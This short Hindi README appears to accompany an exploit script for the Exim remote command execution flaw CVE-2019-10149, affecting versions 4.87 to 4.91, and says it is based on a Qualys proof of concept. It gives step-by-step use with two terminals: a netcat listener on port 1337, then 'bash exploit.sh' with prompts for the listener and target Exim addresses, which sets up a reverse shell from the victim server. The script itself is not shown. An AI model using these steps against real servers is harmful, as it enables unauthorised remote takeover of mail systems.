
एक कमजोर exim सेवा से शेल में रिमोट कमांड निष्पादन।
एक कमजोर exim सेवा से शेल में रिमोट कमांड निष्पादन।
कमजोर संस्करण 4.87 से 4.91 (सम्मिलित) तक हैं। https://nvd.nist.gov/vuln/detail/cve-2019-10149 देखें।
निम्नलिखित स्क्रिप्ट Qualys PoC पर आधारित है। https://packetstormsecurity.com/files/153218/Exim-4.9.1-Remote-Command-Execution.html देखें।
2 टर्मिनल अनुशंसित
T1 $ nc -nlvp 1337
T2 $ bash exploit.sh
$ Listener IP: 192.168.0.1
$ Listener Port: 1337
$ Exim IP: 10.10.0.1
$ Exim Port: 25